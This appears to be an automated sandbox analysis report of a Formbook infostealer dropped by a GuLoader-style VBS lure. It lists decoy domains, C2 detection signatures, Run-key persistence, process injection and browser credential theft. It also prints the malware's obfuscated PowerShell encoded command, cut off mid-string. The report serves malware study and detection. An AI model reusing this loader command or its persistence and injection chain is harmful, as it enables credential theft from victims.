formbook | 27b950f8b84e372d1b9d0fd7b918cb633eaa2556ef47c63baf0b916f04f5bffd

Resubmissions

14-03-2022 14:03

220314-rcpanagcb9 10

14-03-2022 07:19

220314-h5h5nsfgaj 10

Analysis

max time kernel
148s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
14-03-2022 07:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Draft_shipping_document.vbs
Size

805KB
MD5

3d283fd545af947a47e6953d6335b98a
SHA1

331b837d008efc12c0702b290c747581583169fd
SHA256

280925849cd341c089c250b6609a0cab91026578f98bc2c45cb924dc9c8967a5
SHA512

c954754254c31cf881bb96efc601b683ae9ba75a90054626186ac9392958bc5cb3bdc3b1348df3885f998002c0a3c523fd744b29bc149b9894bb04d480bf602c

Score

10^/10

formbook guloader k6sm downloader persistence rat spyware stealer suricata trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

k6sm

Decoy

mingshengjewelry.com

ontimecleaningenterprise.com

alyssa0.xyz

ptecex.xyz

dukfot.online

pvcpc.com

iowalawtechnology.com

nestletranspotation.com

mysithomes.com

greenlakespaseattle.com

evofishingsystems.com

unilytcs.com

ordemt.com

dentalbatonrouge.com

pictureme360.net

chalinaslacatalana.com

newmirrorimage.xyz

pinklaceandlemonade.com

rapinantes.com

yzicpa.com

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata

Formbook Payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3544-160-0x0000000000400000-0x00000000006A3000-memory.dmp	formbook
behavioral2/memory/3544-161-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral2/memory/3544-163-0x0000000000400000-0x00000000006A3000-memory.dmp	formbook
behavioral2/memory/3720-167-0x0000000000540000-0x000000000056F000-memory.dmp	formbook

Adds policy Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	msiexec.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8P8PQTBPFNX = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe"	msiexec.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ieinstal.exe

pid process

3544 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

4716 powershell.exe
3544 ieinstal.exe

pid	process
3544	ieinstal.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exeieinstal.exemsiexec.exe

description	pid	process	target process
PID 4716 set thread context of 3544	4716	powershell.exe	ieinstal.exe
PID 3544 set thread context of 3028	3544	ieinstal.exe	Explorer.EXE
PID 3720 set thread context of 3028	3720	msiexec.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	msiexec.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exeieinstal.exemsiexec.exe

pid	process
4716	powershell.exe
4716	powershell.exe
3544	ieinstal.exe
3544	ieinstal.exe
3544	ieinstal.exe
3544	ieinstal.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe
3720	msiexec.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3028 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeieinstal.exemsiexec.exe

pid process

4716 powershell.exe
3544 ieinstal.exe
3544 ieinstal.exe
3544 ieinstal.exe
3720 msiexec.exe
3720 msiexec.exe
3720 msiexec.exe
3720 msiexec.exe

pid	process
3028	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeieinstal.exeExplorer.EXEmsiexec.exe

description	pid	process
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	3544	ieinstal.exe
Token: SeShutdownPrivilege	3028	Explorer.EXE
Token: SeCreatePagefilePrivilege	3028	Explorer.EXE
Token: SeDebugPrivilege	3720	msiexec.exe
Token: SeShutdownPrivilege	3028	Explorer.EXE
Token: SeCreatePagefilePrivilege	3028	Explorer.EXE
Token: SeShutdownPrivilege	3028	Explorer.EXE
Token: SeCreatePagefilePrivilege	3028	Explorer.EXE

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

WScript.execmd.exepowershell.execsc.exeExplorer.EXEmsiexec.exe

description	pid	process	target process
PID 2368 wrote to memory of 4152	2368	WScript.exe	cmd.exe
PID 2368 wrote to memory of 4152	2368	WScript.exe	cmd.exe
PID 4152 wrote to memory of 4732	4152	cmd.exe	attrib.exe
PID 4152 wrote to memory of 4732	4152	cmd.exe	attrib.exe
PID 2368 wrote to memory of 4716	2368	WScript.exe	powershell.exe
PID 2368 wrote to memory of 4716	2368	WScript.exe	powershell.exe
PID 2368 wrote to memory of 4716	2368	WScript.exe	powershell.exe
PID 4716 wrote to memory of 1736	4716	powershell.exe	csc.exe
PID 4716 wrote to memory of 1736	4716	powershell.exe	csc.exe
PID 4716 wrote to memory of 1736	4716	powershell.exe	csc.exe
PID 1736 wrote to memory of 2000	1736	csc.exe	cvtres.exe
PID 1736 wrote to memory of 2000	1736	csc.exe	cvtres.exe
PID 1736 wrote to memory of 2000	1736	csc.exe	cvtres.exe
PID 4716 wrote to memory of 3544	4716	powershell.exe	ieinstal.exe
PID 4716 wrote to memory of 3544	4716	powershell.exe	ieinstal.exe
PID 4716 wrote to memory of 3544	4716	powershell.exe	ieinstal.exe
PID 4716 wrote to memory of 3544	4716	powershell.exe	ieinstal.exe
PID 3028 wrote to memory of 3720	3028	Explorer.EXE	msiexec.exe
PID 3028 wrote to memory of 3720	3028	Explorer.EXE	msiexec.exe
PID 3028 wrote to memory of 3720	3028	Explorer.EXE	msiexec.exe
PID 3720 wrote to memory of 1136	3720	msiexec.exe	cmd.exe
PID 3720 wrote to memory of 1136	3720	msiexec.exe	cmd.exe
PID 3720 wrote to memory of 1136	3720	msiexec.exe	cmd.exe
PID 3720 wrote to memory of 2344	3720	msiexec.exe	Firefox.exe
PID 3720 wrote to memory of 2344	3720	msiexec.exe	Firefox.exe
PID 3720 wrote to memory of 2344	3720	msiexec.exe	Firefox.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4732 attrib.exe

pid	process
4732	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Draft_shipping_document.vbs"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\System32\cmd.exe
cmd /c attrib
3⤵
- Suspicious use of WriteProcessMemory
PID:4152

C:\Windows\system32\attrib.exe
attrib
4⤵
- Views/modifies file attributes
PID:4732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAFAAVQBUAFQARQBSACAAUgBzAG8AbgBuAGUAcgA5ACAAcwBhAGcAbABpAGcAIABSAEUAUwBVAEwAVABFACAAcwB0AGEAbgBpAHQAcwAgAHAAbwB6AHoAeQBzAGsAIABVAGQAZwByAGYAdABsACAAQwBlAG4AdAAgAEQAaQBzAGsAYgBlAHQANgAgAEgAVgBJAFIAIABDAG8AcwBtAG8ANQAgAEcAcgBhAGQAaQBvAG0AZQB0AHIAIABBAGwAdABhAGkAYQAxACAAZQBuAGkAZwAgAGwAYQBtAGEAaQAgAEgAYQBiAGkAbABlAHMAIABBAEsARQBCAEkARwBZAEwAVAAgAHQAaQBsAGYAagBlAGQAZQBzAGMAIABTAHUAZQB2AGkAZwB0AGkAZwAzACAAQQBuAGEAZwBvAGcAaQBjACAAcgBhAGcAbQBhAG4AbQAgAFUARABWAEkASwBMAEkATgAgAFMAawByAGkAZwBlAG4AZwAgAEYAYQBhAHMAcwB1ACAATQBvAG4AdABlAHIAMgAgAEIAcgBvAGkAZABlAHIAaQAxACAAQgBlAHMAawB5AGQAbgAgAFYAZQByAHQAaQBjAGEAbAAgAA0ACgAjAHQAYQBjAGgAIABIAG8AcgBzAGUAdwBhAHkAOQAgAEoATgBFAEQARQBTAFcARQBMAEwAIABtAGEAbgBkAGYAIABHAGUAbQBtAGUAcwB0ACAASQBtAG0AdQBuAGQAdQA1ACAARgBBAFMAVABFAE4ARQBEAEIAIABGAGwAbwByAGEAbAAxACAAQQBmAHQAcgBkAGUAbAA4ACAAQQBwAHAAZQB0AGkAdABvACAATgBhAHQAYQAyACAAUwBUAEEARgBGACAAQwB5AHIAZQBuAGkAYQBuADMAIABLAEwAVgBFAFIATgBFAEMASABFACAAZgBsAHMAbwBtACAATQBFAEcAQQBMACAAUwBQAFIASQBOAEcARQBSACAAQQBwAHAAbwBpAG4AdABzACAAbgBlAGcAYQB0AGkAdgAgAEIAbABlAG0AbQB5ADMAIABTAHkAbABsAG8AZwBpAHMAIABzAG8AbABhACAARABFAFMAWQAgAE0ATwBEAEUAUgBOAEkAIABzAGwAbwBuAG8AbQBkAGUAIABDAG8AbQBtAHUAbgBhAGwAIABIAGUAdABlAHIAbwBjAGgAaQAzACAATwBUAEkARABJAFAASAAgAFUAZAB2AGkAawBsAGkAbgBnACAARgByAGEAbgBkACAAVwBPAE4AVABJAE4ARwBTAE0ARQAgAEQAVQBNAEEAIAANAAoAIwBOAG8AbgBkAGUAYwBhADMAIABsAGEAYwB0AGkAIAB0AHIAYQBuAHMAdQBtAHAAdABpACAAQQB1AHIAaQAgAEEAdAB0AGUAcwA3ACAATwBOAEsARQBMAEUATgAgAGYAbAB5AHYAZQAgAFUATgBSAE8ATwBTAFQAUwBQAE8AIABhAGIAZQBmAGUAIABQAGgAeQBzACAAVQBuAGMAdQByAHIAaQAxACAATQBvAHoAYQBtAGIAaQBjADgAIABDAFIATwBBAEsAUwBQAEgATwBUACAAbwBwAGwAYQBnAGUAbgAgAEcAbgBhAHMAawBlADcAIABkAHkAcwBmAHUAbgBjAHQAaQBvACAARwByAG8AdwBsAGkAIABSAGgAaQB6AG8AdABhAHgAIABIAGEAcwB0AGIAZQB2AGEAZQBiADIAIABMAHUAYgBiAGUAcgBsAHkAcwB0ADEAIABUAGEAbABpAG8AbgBpAGMAMwAgAEEAawBhAG8AdQB0ACAAVABIAE8AUgBBAEMATwBMAFkAIABHAHIAYQBuACAAVABBAEcARQBOAEUATQBJAFMAVAAgAEsAbwBtAG0AdQBuAGkAIABBAEEAUgBFAEwATwBEAEUAUwAgAEQARQBUAE8AIABUAHIAaQBwAGwAaQBjAGEANAAgAHUAbgBjAG8AbgBmAGUAcgByACAADQAKACMASwBhAHAAaQB0AGEAbABzAHQAIABTAHAAdQByAHQAcwA1ACAAVQBuAGQAZQByAGcAcgBhAGQAdQAgAEUARABFAEwASABBAFIAVAAgAE0ARQBHAEEATABPAE0AIABLAGEAcgBhAG0AYgBvACAAYgBhAGwAawBhAG4AaQBkAGUAIABBAHQAdAByAGkAYgB1AHQANQAgAG0AdQBzAGkAawB0AHkAIABGAGwAagB0ACAAUABhAGMAaAB5AGgAYQBlACAAawBhAHQAaQBwAHUAbgBhAG4AIABVAG4AZABlAHIAcwAgAE0AcgBrAGUAbABvAHkAMQAgAFIAYQBkAGUAcgBuAGEAIABCAGwAbwBkAHAAcgBvAHAAcAAgAFUATgBDAEwARQBGACAAVgBlAGoAcgBzAGEAdABlADEAIABIAE8AVgBFAEQAUwBLAFIATQBFACAAQQBwAHQAZQByAGUAcgBlAHMAcAAgAFQAZQBhAGsAdAByAHMAcwA4ACAAYgByAG4AZQBoAG8AcwBwACAADQAKACMAVABTAEUAVABTAEUAIABGAHIAZQBtAHMAawByAGkAZAA2ACAAYgBhAGcAcwBkACAASAB5AHAAbwB0AG8AbgA2ACAAZABlAG0AYQBnAG4AZQAgAGQAZQBiAHUAdABhAG4AdAAgAEQAZQByAG0AbwBiAHIAYQA5ACAAVQBmAHUAbABkAGsAIABnAGEAcgBiAHMAYgBvAG4AIABDAG8AYQB4AGkAbgBnAGIAeQByACAAUABsAGEAcwAyACAAZgBvAHIAZQBuAGkAbgBnAGUAIABNAGUAbABhAG0AcABzAG8AcgBhADkAIABmAHIAZQBtAHQAIABuAG8AbgBwAGUAIABiAGEAcgB5AG8AbgB1AGQAbAAgAFYAaQB0AHIAaQBmAGEAYwB0AGkAIAANAAoAIwBVAG4AdwBlACAATgBvAG4AZQBwAGkAYwBhAGwAbAA2ACAAVgBFAEQARQBSACAAdQBuAGcAbwBsACAAcwBhAG4AZwBkACAASwBOAFMAVABSAE0AUAAgAFMATQBBAEEAVgBBACAAVABhAGkAbABnAGEAIABFAEEAUgBUAEgAQgBSACAAUwBpAGUAZwBsAGkAbgBnAGkANgAgAGMAYQBsAHkAcAB0ACAATQBJAEMAUgBPAE4ASQBaAEUAIABwAGUAcgBzAG8AbgAgAA0ACgAjAFAAaQB6AHoAaQBjACAASwBhAGwAdgBlAGwAZQB2ACAAcwBjAG8AbABlAGMAbwBsAG8AZwAgAEsAYQBuAHQAaQAgAFMAdABvAGwAcABlAGQAZQBzADkAIABEAFIATgBVAE0ATQBFAFIAVwBJACAAZQB0AGgAZQBvAHMAdABvAG0AIABFAEwARQBDAFQAIABSAGgAeQB0ADQAIABTAHQAaQBrAHAAcgB2ADMAIABQAGUAbABvAHQAYQByAGUAIABCAGUAawByAGYAdABlAHIAMwAgAEYATABFAFgASQBCACAAQgBOAEQATABFAFQAIABUAGUAcwB0AHMAeQBzAHQAZQBtADgAIABNAEkATgBFAFIAIABUAG8AeABvACAAYgB1AGUAbABhACAASABqAGUAcgB0AGUAcwBhAGcAIABTAGsAYQB0ADgAIABDAGgAaQBtAGkAcQB1AGUAbQBpACAAUwBIAE8AVABTAEgARQBMACAAVQBuAGkAcwBlAHgAdQBhAGwAIABSAEUAQQBMAFMASwBPAEwARQAgAEkAbgB0AGUAcgBwAG8AbABhACAASABlAGEAZABzACAAYQBmAHMAZQByAHYAYQByACAAVQBsAHUAbABhAHQAIABSAGUAcABhAGcAYQBuAGkAegBlADIAIAANAAoAIwBOAGEAYgBvAGIAcwBoAGkAcAA2ACAAcABvAG8AZgAgAG8AdgBlAHIAdwBlAHQAdAAgAFIAZQBqAGUAYwB0AG0AIABlAGwAaABlAGcAbgBlAG4AZQBzACAARgBlAHIAdABpAGwAZABhACAAQQBNAEEAWgBPAE4AIABTAEEATgBEACAAVQByAGYAdQBnAGwAIABHAGEAbQBvAHMAdABlAGwAZQBzACAAcAByAG8AYwBvAG0AYgBhAHQAbwAgAEIAYQBnAHYAYQBzAGsAZQBsAHMANQAgAFUAbgBkAGUAcgBuAG8AdQByAGkANwAgAFIAaQBtAGUANQAgAEEAbQBiAGkAdgBhACAATABlAGoAbABpAGcAaABlACAATAB5AHMAaQA1ACAAbABpAHMAdABlAHUAZABzAGEAIABkAGUAbwBkAG8AcgBpAHMAZQAgAGkAbgBnAGUAbgBpAHIAcwAgAEMAQQBDAE8AWgBZAE0AIABKAEEATQBBAEkAIABzAHQAYQBuAGkAZQBsAHAAZQBjACAATQBpAHMAawByAGUAZABpAHQAZQAgAHUAZABtAHIAawBlAGwAcwAgAGcAcgB1AGIAbgBpACAAaABhAGUAbQBvAGMAeQAgAFMAcAByAGkAdABrAHIAcwBlAGwAIAANAAoAIwBNAG8AbgBvACAATgBvAG4AaQBkAGUAYQB0ADkAIABIAGUAcgByAGUAZQAgAEYAbwByAGoAdQBkACAARQBTAE8AUABIACAAUwBPAEMASQBPAEwATwBHACAAZQBhAHIAdAAgAGcAcgB5AGwAbAAgAFMAZQBtAGkAbwAyACAASABlAG0AaQBhAGIANgAgAEkATgBEAEsAQQBMACAAVgBpAGQAdABsAGYAdABpAGcAIABUAFUAUgBJAFMAIABHAGEAdQBzAHMANQAgAEsATwBSAFQAVgAgAEQAZQBrAG8AcgA4ACAADQAKACMAQQBGAEsAUgBGAFQAIABGAGkAbABtAHMAZQBsAHMAawBhADEAIABFAG0AYQBuAHUAZQBsAGUAdQBkADcAIABSAGUAYwBlAGkAdgBlAHIAcwAgAEsARgBFAFIAVABEAEkAIABFAE4AVABPAE0ATwBMAE8AIABQAHIAZQBmADMAIABVAHAAbQBhAG4AcwBoAGkAcAB2ACAATgBlAHAAaAByAG8AcABlAHgAMgAgAEwAcwBlAHAAcgBvAGMAIABQAGwAaQBjADkAIAANAAoAIwBVAGQAcwB1AGcAZQByAGUAIABmAHUAbABkAHYAbwBrACAAdQBkAHIAZQAgAFUATgBNAEUATgAgAEcAdQBpAGQAZQAgAEoATwBSAEQAQgBFAFMASQAgAEsAcgB5AHAAMwAgAHMAZQBhAHIAYwBoACAARgBpAGYAdAB5AHAAZQBuAG4ANwAgAEYAUgBFAFMASQBBAEUAIABBAGkAbgBhAHMAbwBwADEAIABSAEEAVgBBAEcASQBOAEcATABJACAAQwBPAE4AUwBUAFUAIABGAEkATQBCAFIARQAgAE4ATwBOAEEAIABUAFIATwBOAEIARQBTACAAZwBsAHUAaQBuAGUAIABUAGkAZABzAHMAaQA4ACAAUwB0AHIAdQB0AGgAaQBvAGkAZAAgAGMAbwBuAHYAZQByAHMAIABWAEUAWABJAEwATABJAEMARQAgAEwAYQBtAGkAbgBhAHIAaQAxACAATgBhAHAAcABhAHMAawAzACAAUABpAHAAcAAyACAAZABvAHQAaABlAHIAawAgAA0ACgAjAFAAUgBPAEIATABFAE0ARgBZACAAVABoAHkAcgAxACAAUwBhAG4AcwBlAGIAZQBkAHIAYQAgAFAAQQBSAEEATAAgAGEAcgBrAGEAaQBzACAATwBwAGIAeQBnAG4AaQBuAGcAIABCAEUAVABPAE4AIABGAE8AUgBVACAASwBhAGgAeQB0ADIAIABiAGEAbgBlACAAQQBjAGMAcgB1ADMAIABCAHUAbgBrAGUAYgByAHkAbABsADUAIABDAHIAbwB1AHMAdABhAGQAZQB0ACAAbQBhAG4AaQBsAGEAbQByACAAQQBuAGEAcAAgAEkAbgBvAHMAYwB1ADIAIABlAG4AYQBrACAASgBhAGwAbwB1ADgAIABIAGEAaQByAGIAZQBsAGwAZQBzADkAIABFAGQAZABlAHIAawBvAHAAMgAgAGUAeABjAGkAcwBhAGIAbABlAHUAIABPAGwAZQBzADUAIABUAHUAcgBiAGUAIABmAG8AcgBlAGQAIABSAHkAZwB0ADQAIAANAAoAIwBQAEEAUABJAFIAIABLAEwAUwBPAFYARQAgAEEATABHAE8ATABPAEcAIABCAGUAZAByAGkAdgBlAHMAcABpACAAQQBTAEMATwBUAEIAWQBTAFMASQAgAEgAdQBtAG8ANQAgAEsAdQBwAGUAcgBlAG4AMwAgAFUAbgBkAGUAcgBqAHUAZABnADQAIABmAHIAYQBzAGsAcgBpAHYAZQBuACAAcwBxAHUAYQAgAFAAcgBlAGMAZQByAGUAbQAxACAADQAKACMAVABSAEEARQAgAGwAZQBjAHkAdABoAHUAcwBmAG8AIABTAFQAQQBSAFYARQAgAGsAdQBkAHUAbwB2AGUAIABCAGUAawBtAHAAZQBsACAAQwBhAHkAZQA0ACAATQBVAFQASQAgAE8AUABTAEwAVQBHAE4ASQBOAEcAIABSAEUAUABSAE8ARABVAEMASQBCACAAbQB1AGQAaABvAGwAZQBkAG8AZwAgAGMAdQByAHIAIABGAG8AcwBmACAAUwBjAGwAZQByADUAIABBAHIAYQBiAGEAYgBsADEAIAANAAoAIwBQAG8AbABsAGkAYwA2ACAAQwB1AHAAcgBlAGkAMgAgAEwAQQBZAFMAUABSAEUAIABiAGEAbAB1AHQAZAByAGIAeQB1ACAARwBlAHMAdABpAGMAbwA0ACAAcwBlAG4AcwBpAGIAaQBsAGkAdAAgAFAAYQByAGEAZgBmADgAIABDAFUATABUAEkAVgAgAE8AdgBlAHIAIABBAHYAbABzAGcAYQA3ACAAYQBuAHMAdAByAGUAbgBnACAAUwBFAE4ASQBMAEsATwBOAEYAIABzAHAAZQBsAGUAbwBnAGUAbgBlACAASABBAEwAQQBLAEkAUwBUAFMAVAAgAEcAUgBPAFUATgBEAEgATwBHAFMAIABkAGEAZwBkAHIAIABGAEwAUwBFAFIATgBFAFMATQAgAEYAaQBuAGYAbABlAGwAcwBlAHMANQAgAEMAWQBDAEwATwBTAFQAWQBMACAAYwBpAG4AZQBtAGEAcwBjAG8AIABUAGUAawBzACAAZwBhAHMAdAByAG8AbAB5ACAAUgBFAE0ARQBNACAADQAKACMAZABoAHkAYQBuAGEAIABFAEMAVABPAEcARQAgAGQAaQBmAGYAZQByAGUAbgB0ACAASABBAEEATgBEAE8AUABUAFIAIABVAEwAVgBFAFMAIAB2AGkAZQB0ACAAZwBlAG0AbwBsACAAVQBOAEQARQBSAFMAIABDAHkAZQBzACAARAByAGUAcwBzAHUAOQAgAFMAYQBuAGkAdABlAHQAcwBrAG8ANAAgAEgAagB0AGkAZAAgAFQASQBNAE0ASQBTAE4ATwAgAHAAYQByAHQAaQBvAHIAZwBhACAAWgBvAG4AZQBsACAAUgBkAGcAYQByAGQANwAgAEMATwBHAE0AQQAgAGsAbwBtAG0AYQB0AGUAcgAgAGgAZQBtAGkAcgAgAEwAQQBEAFkATABJAEsAIABtAGEAYQBsAGUAbgAgAEcAeQBuAGEAbgBkAHIAbwBwAGgANwAgAEEAbABlAHkAcgBvAGQAaQBkADUAIAANAAoAIwBSAGEAZABpAG8ANAAgAEMAYQByAHkAbwBwADcAIABBAEYAVABFAFMAVABBAEIAVQBaACAAYgBhAGMAawAgAGEAbABrAHkAbABhAG0AaQBuACAAQgByAHkAcwB0AHMAMQAgAGsAbwByAHMAZQAgAHMAdABhAHYAZQAgAEYAWQBSAFQATwBFAEoAIABLAE8ATABMAE8ASQBEAEUAUgBOACAAVQBEAEwAQgAgAEQAZQBkAHUAYwBlAHIAOAAgAFYASQBSAEsAUwAgAEwAbwByAG8AIABJAGMAbwBuAG8AbQBhAHQAIABrAG8AbQBwAGEAIABEAGkAYwBoAGwAbwByADQAIABCAGkAbABhADEAIABTAGEAbQBhAHIAMgAgAEMASABPAEkATABFAFIAUAAgAFMAYQBtAG0AZQBuACAAQwBoAGUAYwAgAFcAaQBuAGQAbAAgAFIAaQBuAGQAbABlADUAIABVAEQAQQBOAFMASwBFAFMAUwAgAHMAbwBsAHYAbwBnAG4AZQBzAHMAIABMAEEAVgBQAEEAIABTAGgAYQBjAGsAbwBwAGgAZQAgAFQASQBOAEsARQBSAEwASQBLAEUAIABTAHUAbQBlADgAIABUAG4AZABlAGwAaQBnAGMAbwBuACAAbQBhAGwAYQBjACAADQAKACMAVQBEAEEARABWAEUATgBEACAAbQBlAGQAbABlACAARQByAGgAdgBlAHIAIABrAGEAYgBiAGEAbABpAHMAIABQAFIASQBDAEsAIABTAGUAbQBpAHAAbwBzAHQAYQA2ACAAbgBvAG4AYwBvAG4AcwAgAEMAQQBKAEEATgAgAE8AVQBUAEcATgBBAFcASABPAE0AIABTAGsAcgB0AGUAOQAgAGgAZQBuAHMAaQBnAHQAcwBtACAAcwBjAGgAZQBkAHUAIABIAGEAdQBzAHQAbwByAGkAYQAgAFAAcgBlAGMAbABpADUAIABCAEkAVABUACAAcwB0AHIAaQBkAHMAcwBrAHIAIABBAG4AZwBsAG8AbQBhAG4AZQAyACAAUwB1AHAAcAA5ACAAQgBhAGcAYQB0AGUAbABsAGUAcgAyACAAQgByAGEAbQBpADkAIABTAFQARQBOAEgAVQAgAEgATwBNAE8AIABsAGcAZQBtAGkAIABOAGUAcABoAHIAbwBuAGMAdQA1ACAADQAKACMAQgByAGwAZQA1ACAATQBlAHoAcQB1ADEAIABzAGwAYQBrAGUAIABQAEUATgBJAEIARQAgAGsAbwBuAHQAcgBpAGIAIAB0AG8AcgBuAHMAawBhAGQAZQAgAEIAUgBLAE0ASQBEAEwARQAgAGcAaQB1AGwAaQBvAGQAZQB0AHIAIABTAFQATwBFAEQAVABDAEgASQBMACAATQBlAHQAZQA5ACAAVAB1AGYAbwBsAGkAcgBvAGUAcwAgAGIAYQBjAGsAcwB0AG8AIABVAGQAYgB1AGQAcwAgAEIAQQBOAE4AIABGAE8AUgBCACAATQBhAGcAaQBzAHQAZQByAGYANAAgAFMAdQBiAGsAdQB0AGEAbgB0ACAAUwBlAGoAcwBlAGQAIABDAEgAQQBOAEMAIABiAGkAbABsAGkAZwBsAHMAIABFAEMAVABPAEUATgBaAFkAIABNAGkAbAB0ACAADQAKACMASABPAFcAUwBPAEUAVgAgAHIAbwB1AHMAZQBzAHAAIABHAEEATABWACAAVQBuAHMAdQBiADEAIABTAE0ASwBLAEUAVABEACAATwB1AHQAcAA3ACAAQwBPAE4ATwAgAFYAcgBkAGkAcgBlAGQAdQA1ACAASABBAFQAQwBIAEUAQwBLACAAUwBvAGcAbgBlAHYAZQAgAFIARQBKAEkAIAB0AGEAaQByAGcAIABjAGEAcgBiAG8AbAAgAEsAVgBBAEoARQBWAEkAIABTAE4AQQBLAEUAIABVAG4AbQBpAGMAcgBvAGIAaQAgAEsATgBZAFQATgBJAE4ARwAgAGIAYQByAG4AYQBnAHQAaQBnAGgAIABJAEwATABBAFQAIABCAFUAUgBFAEEAVQAgAFIASABBAEIARAAgAEwAdQByAGkANQAgAA0ACgAjAE4AbwBzAG8AZwBlAG8AMQAgAEQASQBTAEYAIABCAGUAbABvADUAIABOAGkAYwBvADIAIABFAFAASQBLAE8AIABmAG8AcgBzAHkAIABTAHkAbQBwAGEAdAAgAEIAagByAGcANAAgAEgAZQBiAHIAaQBzAGsAZQBhAGwAIAByAGUAdAByAGEAbgBzAG0AaQAgAFMASQBHAE4ARQBUAEUAVABTAEEAIABLAG4AZQBlAGwAZQBkAHMAcABpADgAIABTAHQAdQBuAHQAaQA0ACAARwByAGEAdgBhADEAIABSAGUAcgBhAG4AcwBrACAAVQBOAEUATABEAEUAUgBMAFkAIABGAG8AcgBnAG4AZwAgAHIAZQBpAG4AaAAgAGkAcwBvAGMAcgB5AG0AaQAgAE0AbwBuAG8AdABvAG4AbwB1ADQAIABtAGUAcwBvAHQAaABlAHIAIABUAEkATABCAEEARwBFAFYARQBKACAARABFAE4ARABSACAAYwBlAHIAdABpAGYAIABQAGkAbABlAHMAcABpAGQAcwAgAFMAZQBqAGwAcgBlAG4AZABlAGgANQAgAA0ACgAjAGIAYQBrAGUAcwBjACAAQQBmAGwAZQBkADkAIAB2AGEAcwBrAGUAbQBpACAAVAByAGEAbgBzAG0AZQA2ACAATQBvAHUAcgBuAGYAdQBsAGwANQAgAG0AYQBjAHIAbwBwAHIAaQAgAFAAYQByAHQAaQBlAGQAbgAyACAAUABiAGUAbABhAGcAOAAgAFQAdQByAGIAbwBqAGUAdAB0ACAARQBSAE0AQQBOAE4ATwBTACAAYQB1AGMAYQBuAHIAdQAgAEUAUgBZAFQASABSAE8AIAByAGUAZwBpAG8AbgBzACAAcABoAGkAbABvAGwAbwBnAHEAIABIAHUAbQByAGUAeAAgAE4AaQBoAGkAbABpAHMAdAAyACAASwBhAGwAaQBiAHIAZQByAGUAdAAgAE8AdgBlAHIAcwAgAE0AZQBsAGkAY